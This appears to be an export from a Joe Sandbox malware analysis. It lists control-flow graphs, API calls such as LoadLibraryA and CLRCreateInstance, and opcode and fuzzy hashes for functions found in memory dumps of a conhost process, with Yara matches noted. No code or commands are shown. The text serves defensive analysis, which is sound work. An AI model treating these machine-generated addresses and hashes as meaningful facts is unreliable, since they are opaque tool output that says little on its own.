                                                                  control_flow_graph 146 1575946e106-1575946e157 call 1575946f2de * 3 153 1575946e189 146->153 154 1575946e159-1575946e15c 146->154 156 1575946e18c-1575946e19d 153->156 154->153 155 1575946e15e-1575946e161 154->155 155->153 157 1575946e163-1575946e17a 155->157 159 1575946e19e-1575946e1c9 call 1575946f85e call 1575946f87e 157->159 160 1575946e17c-1575946e183 157->160 166 1575946e1cb-1575946e200 call 1575946f492 call 1575946f352 159->166 167 1575946e206-1575946e21d call 1575946f2de 159->167 160->153 161 1575946e185 160->161 161->153 166->167 176 1575946e462-1575946e473 166->176 167->153 173 1575946e223-1575946e224 167->173 175 1575946e22a-1575946e230 173->175 177 1575946e269-1575946e273 175->177 178 1575946e232 175->178 179 1575946e4a6-1575946e4c7 call 1575946f87e 176->179 180 1575946e475-1575946e47f 176->180 182 1575946e275-1575946e290 call 1575946f2de 177->182 183 1575946e2a1-1575946e2aa 177->183 181 1575946e234-1575946e236 178->181 207 1575946e4cd-1575946e4cf 179->207 208 1575946e4c9 179->208 180->179 187 1575946e481-1575946e49f call 1575946f87e 180->187 188 1575946e238-1575946e23e 181->188 189 1575946e250-1575946e252 181->189 182->176 198 1575946e296-1575946e29f 182->198 185 1575946e2ac-1575946e2b6 call 1575946d4d2 183->185 186 1575946e2c5-1575946e2c8 183->186 185->176 204 1575946e2bc-1575946e2c3 185->204 186->176 193 1575946e2ce-1575946e2d8 186->193 187->179 188->189 195 1575946e240-1575946e24e 188->195 189->177 196 1575946e254-1575946e267 LoadLibraryA 189->196 200 1575946e2da-1575946e2db 193->200 201 1575946e2e2-1575946e2e9 193->201 195->181 195->189 196->175 198->182 198->183 200->201 205 1575946e31d-1575946e321 201->205 206 1575946e2eb-1575946e2ec 201->206 204->201 209 1575946e3fd-1575946e405 205->209 210 1575946e327-1575946e349 205->210 212 1575946e2ee call 1575946d2a2 206->212 207->156 208->207 213 1575946e457-1575946e45d call 1575946e90e 209->213 214 1575946e407-1575946e40d 209->214 210->176 223 1575946e34f-1575946e369 call 1575946f85e 210->223 215 1575946e2f3-1575946e2f5 212->215 213->176 218 1575946e424-1575946e436 call 1575946deb2 214->218 219 1575946e40f-1575946e415 214->219 220 1575946e2f7-1575946e2fe 215->220 221 1575946e304-1575946e307 call 1575946d3ba 215->221 233 1575946e448-1575946e455 call 1575946d952 218->233 234 1575946e438-1575946e443 call 1575946e4d6 218->234 219->176 224 1575946e417-1575946e422 call 1575946ed6a 219->224 220->176 220->221 226 1575946e30c-1575946e30e 221->226 237 1575946e36b-1575946e36e 223->237 238 1575946e389-1575946e3b2 223->238 224->176 226->205 230 1575946e310-1575946e317 226->230 230->176 230->205 233->176 234->233 237->209 240 1575946e374-1575946e387 call 1575946f5e2 237->240 238->176 243 1575946e3b8-1575946e3f8 238->243 245 1575946e3fa-1575946e3fb 240->245 243->176 243->245 245->209
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000015759250000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_15759250000_conhost.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: e85963f26a05e09d368196b1c7f413e753b92ff7721d7fdd34470331445b4a6a
                                                                  • Instruction ID: 74983336d2c02bc076b6f7e11c3207458aaf3810f85eaa7fc7990a1490f33266
                                                                  • Opcode Fuzzy Hash: e85963f26a05e09d368196b1c7f413e753b92ff7721d7fdd34470331445b4a6a
                                                                  • Instruction Fuzzy Hash: C7C1C6B0328D45DBE76ADA68DC867EB73D1FBC5302F544169D44ACB1C6EB20EC52CA81
                                                                  Function 00007FFD9B8A5106 Relevance: .5, Instructions: 477COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 311 7ffd9b8a5106-7ffd9b8a5113 312 7ffd9b8a5115-7ffd9b8a511d 311->312 313 7ffd9b8a511e-7ffd9b8a51e7 311->313 312->313 317 7ffd9b8a51e9-7ffd9b8a51f2 313->317 318 7ffd9b8a5253 313->318 317->318 319 7ffd9b8a51f4-7ffd9b8a5200 317->319 320 7ffd9b8a5255-7ffd9b8a527a 318->320 321 7ffd9b8a5239-7ffd9b8a5251 319->321 322 7ffd9b8a5202-7ffd9b8a5214 319->322 326 7ffd9b8a52e6 320->326 327 7ffd9b8a527c-7ffd9b8a5285 320->327 321->320 323 7ffd9b8a5216 322->323 324 7ffd9b8a5218-7ffd9b8a522b 322->324 323->324 324->324 328 7ffd9b8a522d-7ffd9b8a5235 324->328 330 7ffd9b8a52e8-7ffd9b8a5390 326->330 327->326 329 7ffd9b8a5287-7ffd9b8a5293 327->329 328->321 331 7ffd9b8a5295-7ffd9b8a52a7 329->331 332 7ffd9b8a52cc-7ffd9b8a52e4 329->332 341 7ffd9b8a53fe 330->341 342 7ffd9b8a5392-7ffd9b8a539c 330->342 333 7ffd9b8a52a9 331->333 334 7ffd9b8a52ab-7ffd9b8a52be 331->334 332->330 333->334 334->334 336 7ffd9b8a52c0-7ffd9b8a52c8 334->336 336->332 344 7ffd9b8a5400-7ffd9b8a5429 341->344 342->341 343 7ffd9b8a539e-7ffd9b8a53ab 342->343 345 7ffd9b8a53ad-7ffd9b8a53bf 343->345 346 7ffd9b8a53e4-7ffd9b8a53fc 343->346 351 7ffd9b8a542b-7ffd9b8a5436 344->351 352 7ffd9b8a5493 344->352 347 7ffd9b8a53c1 345->347 348 7ffd9b8a53c3-7ffd9b8a53d6 345->348 346->344 347->348 348->348 350 7ffd9b8a53d8-7ffd9b8a53e0 348->350 350->346 351->352 354 7ffd9b8a5438-7ffd9b8a5446 351->354 353 7ffd9b8a5495-7ffd9b8a5526 352->353 362 7ffd9b8a552c-7ffd9b8a553b 353->362 355 7ffd9b8a5448-7ffd9b8a545a 354->355 356 7ffd9b8a547f-7ffd9b8a5491 354->356 358 7ffd9b8a545c 355->358 359 7ffd9b8a545e-7ffd9b8a5471 355->359 356->353 358->359 359->359 360 7ffd9b8a5473-7ffd9b8a547b 359->360 360->356 363 7ffd9b8a553d 362->363 364 7ffd9b8a5543-7ffd9b8a55a8 call 7ffd9b8a55c4 362->364 363->364 371 7ffd9b8a55aa 364->371 372 7ffd9b8a55af-7ffd9b8a55c3 364->372 371->372
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1727463833.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b8a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d60ed53a887e5aa8f837887f77310cf7335e44ad723f416ff86b2bb62ebeaccc
                                                                  • Instruction ID: bbc9827d517294c9c122437d6320ec9945dd94ff8d4b3b72b6a1c5cb310a91f4
                                                                  • Opcode Fuzzy Hash: d60ed53a887e5aa8f837887f77310cf7335e44ad723f416ff86b2bb62ebeaccc
                                                                  • Instruction Fuzzy Hash: 5AF1C930609A8D8FEBA8DF28C8657E937D1FF59311F04426ED84DC7295DB34A9858782
                                                                  Function 00007FFD9B8A5EB2 Relevance: .5, Instructions: 463COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 373 7ffd9b8a5eb2-7ffd9b8a5ebf 374 7ffd9b8a5eca-7ffd9b8a5f97 373->374 375 7ffd9b8a5ec1-7ffd9b8a5ec9 373->375 379 7ffd9b8a5f99-7ffd9b8a5fa2 374->379 380 7ffd9b8a6003 374->380 375->374 379->380 382 7ffd9b8a5fa4-7ffd9b8a5fb0 379->382 381 7ffd9b8a6005-7ffd9b8a602a 380->381 389 7ffd9b8a6096 381->389 390 7ffd9b8a602c-7ffd9b8a6035 381->390 383 7ffd9b8a5fe9-7ffd9b8a6001 382->383 384 7ffd9b8a5fb2-7ffd9b8a5fc4 382->384 383->381 386 7ffd9b8a5fc6 384->386 387 7ffd9b8a5fc8-7ffd9b8a5fdb 384->387 386->387 387->387 388 7ffd9b8a5fdd-7ffd9b8a5fe5 387->388 388->383 392 7ffd9b8a6098-7ffd9b8a60bd 389->392 390->389 391 7ffd9b8a6037-7ffd9b8a6043 390->391 393 7ffd9b8a6045-7ffd9b8a6057 391->393 394 7ffd9b8a607c-7ffd9b8a6094 391->394 398 7ffd9b8a612b 392->398 399 7ffd9b8a60bf-7ffd9b8a60c9 392->399 396 7ffd9b8a6059 393->396 397 7ffd9b8a605b-7ffd9b8a606e 393->397 394->392 396->397 397->397 400 7ffd9b8a6070-7ffd9b8a6078 397->400 402 7ffd9b8a612d-7ffd9b8a615b 398->402 399->398 401 7ffd9b8a60cb-7ffd9b8a60d8 399->401 400->394 403 7ffd9b8a60da-7ffd9b8a60ec 401->403 404 7ffd9b8a6111-7ffd9b8a6129 401->404 409 7ffd9b8a61cb 402->409 410 7ffd9b8a615d-7ffd9b8a6168 402->410 405 7ffd9b8a60ee 403->405 406 7ffd9b8a60f0-7ffd9b8a6103 403->406 404->402 405->406 406->406 408 7ffd9b8a6105-7ffd9b8a610d 406->408 408->404 411 7ffd9b8a61cd-7ffd9b8a62a5 409->411 410->409 412 7ffd9b8a616a-7ffd9b8a6178 410->412 422 7ffd9b8a62ab-7ffd9b8a62ba 411->422 413 7ffd9b8a617a-7ffd9b8a618c 412->413 414 7ffd9b8a61b1-7ffd9b8a61c9 412->414 415 7ffd9b8a618e 413->415 416 7ffd9b8a6190-7ffd9b8a61a3 413->416 414->411 415->416 416->416 418 7ffd9b8a61a5-7ffd9b8a61ad 416->418 418->414 423 7ffd9b8a62bc 422->423 424 7ffd9b8a62c2-7ffd9b8a6324 call 7ffd9b8a6340 422->424 423->424 431 7ffd9b8a6326 424->431 432 7ffd9b8a632b-7ffd9b8a633f 424->432 431->432
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1727463833.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b8a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a62921ba2af0efe7a94018373272ffad4ead92749bba7e8285d2ad2ade4d1b44
                                                                  • Instruction ID: e3c19966b6cb142fd27aaa440a5345b41b4f66e9c36b7c0eec689e49c1897ffe
                                                                  • Opcode Fuzzy Hash: a62921ba2af0efe7a94018373272ffad4ead92749bba7e8285d2ad2ade4d1b44
                                                                  • Instruction Fuzzy Hash: 6FE1C570A09A4D8FEBA8DF28C8657E97BD1FF58310F04426ED84DC7295DF74A9818782
                                                                  Function 000001575946E4D6 Relevance: .4, Instructions: 407COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 433 1575946e4d6-1575946e526 434 1575946e52c-1575946e53f 433->434 435 1575946e724-1575946e762 433->435 438 1575946e71b-1575946e71f 434->438 439 1575946e545-1575946e559 434->439 442 1575946e768-1575946e797 435->442 443 1575946e8f0-1575946e90a 435->443 441 1575946e8ed-1575946e8ee 438->441 439->441 445 1575946e55f-1575946e590 439->445 441->443 449 1575946e8de-1575946e8e8 442->449 450 1575946e79d-1575946e7bb 442->450 452 1575946e596-1575946e5b4 445->452 453 1575946e6c4-1575946e6ef 445->453 449->441 457 1575946e8d5-1575946e8d6 450->457 458 1575946e7c1-1575946e7cd 450->458 463 1575946e65a-1575946e6a0 452->463 464 1575946e5ba-1575946e617 452->464 456 1575946e6f9-1575946e6fc 453->456 456->441 460 1575946e702-1575946e716 456->460 457->449 461 1575946e87e-1575946e8c5 458->461 462 1575946e7d3-1575946e813 458->462 460->441 470 1575946e8c7-1575946e8c8 461->470 471 1575946e8d0-1575946e8d1 461->471 462->461 480 1575946e815-1575946e821 462->480 479 1575946e6a8-1575946e6bc 463->479 481 1575946e61d-1575946e61e 464->481 482 1575946e6a2-1575946e6a3 464->482 470->471 471->457 479->453 480->461 483 1575946e823-1575946e829 480->483 484 1575946e621-1575946e653 481->484 482->479 485 1575946e82c-1575946e857 483->485 490 1575946e655-1575946e658 484->490 491 1575946e859-1575946e862 485->491 492 1575946e864-1575946e877 485->492 490->479 491->492 492->485 493 1575946e879-1575946e87c 492->493 493->461 493->471
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000015759250000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_15759250000_conhost.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4df33c4ccec31c159c2c9679ea8671149bf8637389190af38ec92ac25d3ec371
                                                                  • Instruction ID: 39de89a7dd1894125995aa74cfdee51170ec7b6c756b19333aa7ec9459676682
                                                                  • Opcode Fuzzy Hash: 4df33c4ccec31c159c2c9679ea8671149bf8637389190af38ec92ac25d3ec371
                                                                  • Instruction Fuzzy Hash: D0E18D71518A488BDB59DF28D889BEAB7E1FF94301F04462DE84BCB191EF30E946CB41
                                                                  Function 00007FFD9B8A0120 Relevance: 5.2, Strings: 4, Instructions: 213COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1727463833.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b8a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (7<k$07<k$87<k$87<k
                                                                  • API String ID: 0-3253434258
                                                                  • Opcode ID: 88fe017301a872a23785aaa9e22023816e1bcf62c969de13e226ce1b88c783dd
                                                                  • Instruction ID: 01d2ddc26c3e93b28b801de8b5d55fab2c1fe676563268a7992db74193ff4142
                                                                  • Opcode Fuzzy Hash: 88fe017301a872a23785aaa9e22023816e1bcf62c969de13e226ce1b88c783dd
                                                                  • Instruction Fuzzy Hash: A951C360B0DA451FE758BBB8446967A7BD1EF9D714F0505BDE08EC72D2CD2CAC428346
                                                                  Function 00007FFD9B8A15AD Relevance: 5.2, Strings: 4, Instructions: 213COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1727463833.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b8a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6<kW$@7<k$H7<k$6<k
                                                                  • API String ID: 0-704970944
                                                                  • Opcode ID: cc6e8c5cb255a5844736cc7b49d8806bb040c8d82430d167cd1c44c559396ba9
                                                                  • Instruction ID: 6b2e0e1fa5b337d39c9b1fa6b3488763d0906c697ecceaff76690e8c2dd112ae
                                                                  • Opcode Fuzzy Hash: cc6e8c5cb255a5844736cc7b49d8806bb040c8d82430d167cd1c44c559396ba9
                                                                  • Instruction Fuzzy Hash: 7151EA31B0A94D5FE7A5FBAC84796B977E1EF9971470900BDD04AC72A2DE2CAC02C711
                                                                  Function 00007FFD9B8A1221 Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1727463833.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b8a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (7<k$07<k$87<k
                                                                  • API String ID: 0-1414331572
                                                                  • Opcode ID: 03e77ab9ac277f7ec3c765a8ec53cc1a7d3256f499fac55bc78f31773b259279
                                                                  • Instruction ID: b6052df284d7749d567b92e00d61d3340d59072a40dc01a678fd783ee4086eeb
                                                                  • Opcode Fuzzy Hash: 03e77ab9ac277f7ec3c765a8ec53cc1a7d3256f499fac55bc78f31773b259279
                                                                  • Instruction Fuzzy Hash: 7251F360B0DA891FE754FBB844696A97BE1EF9D314F0501BEE08EC72E3CD2C98418356
                                                                  Function 000001575946DEB2 Relevance: 3.2, APIs: 2, Instructions: 235COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 111 1575946deb2-1575946deec 112 1575946e0f5-1575946e0f7 111->112 113 1575946def2-1575946df05 CLRCreateInstance 111->113 114 1575946e0fd-1575946e103 112->114 115 1575946df92-1575946df9e 112->115 116 1575946df0b-1575946df45 113->116 117 1575946e0d1-1575946e0d2 113->117 119 1575946e0b5-1575946e0d0 114->119 122 1575946dfa4-1575946dff3 115->122 123 1575946e0b2-1575946e0b3 115->123 126 1575946df87-1575946df88 116->126 127 1575946df47-1575946df5a 116->127 118 1575946e0d4-1575946e0ed 117->118 118->112 122->123 136 1575946dff9-1575946e00f 122->136 123->119 128 1575946df8a-1575946df8c 126->128 127->118 131 1575946df60-1575946df68 127->131 128->115 128->118 131->128 133 1575946df6a-1575946df80 131->133 135 1575946df85 133->135 135->128 136->123 138 1575946e015-1575946e046 136->138 138->123 140 1575946e048-1575946e054 138->140 141 1575946e06b-1575946e091 140->141 142 1575946e056-1575946e069 140->142 144 1575946e0a9-1575946e0ac SafeArrayDestroy 141->144 145 1575946e093-1575946e0a7 141->145 142->141 142->142 144->123 145->144 145->145
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000015759250000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_15759250000_conhost.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ArrayCreateDestroyInstanceSafe
                                                                  • String ID:
                                                                  • API String ID: 3902440814-0
                                                                  • Opcode ID: e3a29ec6c90617ad7c1928cbae39db72877cdd96e7781ee4f5e73e7a13d7ce10
                                                                  • Instruction ID: e504df1639c4aa6f9abf43b7bfe65154222cffa627adc96d5fddcd857858098b
                                                                  • Opcode Fuzzy Hash: e3a29ec6c90617ad7c1928cbae39db72877cdd96e7781ee4f5e73e7a13d7ce10
                                                                  • Instruction Fuzzy Hash: 51817E70218E488FD769EF28D889BA777E1FF95305F004A6D948BCB191EB31E945CB41
                                                                  Function 000001575946D3BA Relevance: 1.6, APIs: 1, Instructions: 125libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 247 1575946d3ba-1575946d3dd LoadLibraryA 248 1575946d3e9-1575946d3fc 247->248 249 1575946d3df-1575946d3e4 247->249 252 1575946d4be 248->252 253 1575946d402-1575946d413 248->253 250 1575946d4c0-1575946d4d0 249->250 252->250 253->252 254 1575946d419-1575946d431 253->254 254->252 256 1575946d437-1575946d46b call 1575946f85e 254->256 256->252 261 1575946d46d-1575946d47e 256->261 261->252 262 1575946d480-1575946d497 261->262 262->252 264 1575946d499-1575946d4b9 call 1575946f85e 262->264 264->249
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000015759250000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_15759250000_conhost.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                                                  • Instruction ID: d0b230256df0c46299d86c5a46cf61d8e15c1bc4c93e602600baa1a01120371a
                                                                  • Opcode Fuzzy Hash: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                                                  • Instruction Fuzzy Hash: 9B31B67131CE588FEB59AA28EC863AA73D5EBD4311F001169EC4BC72C6EE64ED4187C1
                                                                  Function 000001575946D2AF Relevance: 1.6, APIs: 1, Instructions: 115libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 268 1575946d2af-1575946d2c5 LoadLibraryA 269 1575946d2c7-1575946d2cc 268->269 270 1575946d2d1-1575946d2e4 268->270 271 1575946d3a8-1575946d3b8 269->271 273 1575946d2ea-1575946d2fb 270->273 274 1575946d3a6 270->274 273->274 275 1575946d301-1575946d319 273->275 274->271 275->274 277 1575946d31f-1575946d353 call 1575946f85e 275->277 277->274 282 1575946d355-1575946d366 277->282 282->274 283 1575946d368-1575946d37f 282->283 283->274 285 1575946d381-1575946d3a1 call 1575946f85e 283->285 285->269
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000015759250000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_15759250000_conhost.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                                                  • Instruction ID: da28836ab380279fdda2d911e2937103535b3bee9c5fdc0fdd5c18fc908e982d
                                                                  • Opcode Fuzzy Hash: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                                                  • Instruction Fuzzy Hash: 46318F7131CE588BDB55EA5CEC4629A73D2E7D8321F0402599C4BCB2C9EE60DD4187C1
                                                                  Function 000001575946D2A2 Relevance: 1.5, APIs: 1, Instructions: 35libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 289 1575946d2a2-1575946d2c5 LoadLibraryA 291 1575946d2c7-1575946d2cc 289->291 292 1575946d2d1-1575946d2e4 289->292 293 1575946d3a8-1575946d3b8 291->293 295 1575946d2ea-1575946d2fb 292->295 296 1575946d3a6 292->296 295->296 297 1575946d301-1575946d319 295->297 296->293 297->296 299 1575946d31f-1575946d353 call 1575946f85e 297->299 299->296 304 1575946d355-1575946d366 299->304 304->296 305 1575946d368-1575946d37f 304->305 305->296 307 1575946d381-1575946d3a1 call 1575946f85e 305->307 307->291
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000015759250000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_15759250000_conhost.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                                                  • Instruction ID: 1534f5c11627e2571a38f2093717298652f6a00a5ff5e680f2dc27fbfb12e6a7
                                                                  • Opcode Fuzzy Hash: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                                                  • Instruction Fuzzy Hash: 88E0D83121CE1D5FF758E59DEC4A7F666D8D796372F00002EE54AC2141F145DC914391
                                                                  Function 00007FFD9B8A01D3 Relevance: .3, Instructions: 337COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 495 7ffd9b8a01d3-7ffd9b8a02d9 516 7ffd9b8a031c-7ffd9b8a0349 495->516 517 7ffd9b8a02db-7ffd9b8a02ee 495->517 522 7ffd9b8a038c-7ffd9b8a0428 516->522 523 7ffd9b8a034b-7ffd9b8a0389 516->523 532 7ffd9b8a0487-7ffd9b8a04b0 522->532 533 7ffd9b8a042a-7ffd9b8a0486 522->533 523->522 536 7ffd9b8a04ba-7ffd9b8a04d8 532->536 533->532
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1727463833.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b8a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 43e6ef9a440f2b302c7dd0e08d6296b72999e57670a3adbc46ea4f3694308574
                                                                  • Instruction ID: fe74179f70d9188f74b5897baa5f11a6b2edea1287a73a6c3dd753a5f930002b
                                                                  • Opcode Fuzzy Hash: 43e6ef9a440f2b302c7dd0e08d6296b72999e57670a3adbc46ea4f3694308574
                                                                  • Instruction Fuzzy Hash: E991042BB0D1D51AD315F67DB8699ED3B60DFC223A71981FBC1D98E097CC08544B82A5
                                                                  Function 00007FFD9B8A02F0 Relevance: .2, Instructions: 204COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 538 7ffd9b8a02f0-7ffd9b8a0349 545 7ffd9b8a038c-7ffd9b8a0428 538->545 546 7ffd9b8a034b-7ffd9b8a0389 538->546 555 7ffd9b8a0487-7ffd9b8a04b0 545->555 556 7ffd9b8a042a-7ffd9b8a0486 545->556 546->545 559 7ffd9b8a04ba-7ffd9b8a04d8 555->559 556->555
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1727463833.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b8a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 376ac4fdde31c8f5eb38b2963560c897a98b4fde669f0fd99d68ab1b144325bd
                                                                  • Instruction ID: 0b12b62dd1d4913f2a2fc1b1897f6f692557b9673dc919eca23159974c987bb0
                                                                  • Opcode Fuzzy Hash: 376ac4fdde31c8f5eb38b2963560c897a98b4fde669f0fd99d68ab1b144325bd
                                                                  • Instruction Fuzzy Hash: 5A51493770E2991FD315EA7DE8689ED3B60EFC2339B1541BBC1D9CA097C918584B82A1
                                                                  Function 00007FFD9B8A109A Relevance: .2, Instructions: 177COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 561 7ffd9b8a109a-7ffd9b8a10a1 562 7ffd9b8a10aa-7ffd9b8a10bb 561->562 563 7ffd9b8a10a3 561->563 564 7ffd9b8a10bd 562->564 565 7ffd9b8a10c4-7ffd9b8a10d3 562->565 563->562 564->565 566 7ffd9b8a10d5 565->566 567 7ffd9b8a10dc-7ffd9b8a10eb 565->567 566->567 568 7ffd9b8a10ed 567->568 569 7ffd9b8a10f4-7ffd9b8a1103 567->569 568->569 570 7ffd9b8a1105 569->570 571 7ffd9b8a110c-7ffd9b8a111b 569->571 570->571 572 7ffd9b8a111d 571->572 573 7ffd9b8a1124-7ffd9b8a1133 571->573 572->573 574 7ffd9b8a1135 573->574 575 7ffd9b8a113c-7ffd9b8a114b 573->575 574->575 576 7ffd9b8a114d 575->576 577 7ffd9b8a1154-7ffd9b8a1163 575->577 576->577 578 7ffd9b8a1165 577->578 579 7ffd9b8a116c-7ffd9b8a117b 577->579 578->579 580 7ffd9b8a117d 579->580 581 7ffd9b8a1184-7ffd9b8a1193 579->581 580->581 582 7ffd9b8a1195 581->582 583 7ffd9b8a119c-7ffd9b8a11ab 581->583 582->583 584 7ffd9b8a11ad 583->584 585 7ffd9b8a11b4-7ffd9b8a11c3 583->585 584->585 586 7ffd9b8a11c5 585->586 587 7ffd9b8a11cc-7ffd9b8a11f2 585->587 586->587 590 7ffd9b8a11f9-7ffd9b8a11fe call 7ffd9b8a0120 587->590 592 7ffd9b8a1203-7ffd9b8a121a 590->592
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1727463833.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b8a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 94d5ba589cb03fccd48831ca6709e560780329b734f99ab574b1335248755580
                                                                  • Instruction ID: 4b3ceee7d336aa00b7a1fcc0b2ec3ffcbcfae1c66f3c7271f4d7c78ebf5fba0d
                                                                  • Opcode Fuzzy Hash: 94d5ba589cb03fccd48831ca6709e560780329b734f99ab574b1335248755580
                                                                  • Instruction Fuzzy Hash: FD514020A8F3C55FE317A374AC75A953FA16F87354F1E41DAE4C5CA0B3C6AA0589C722
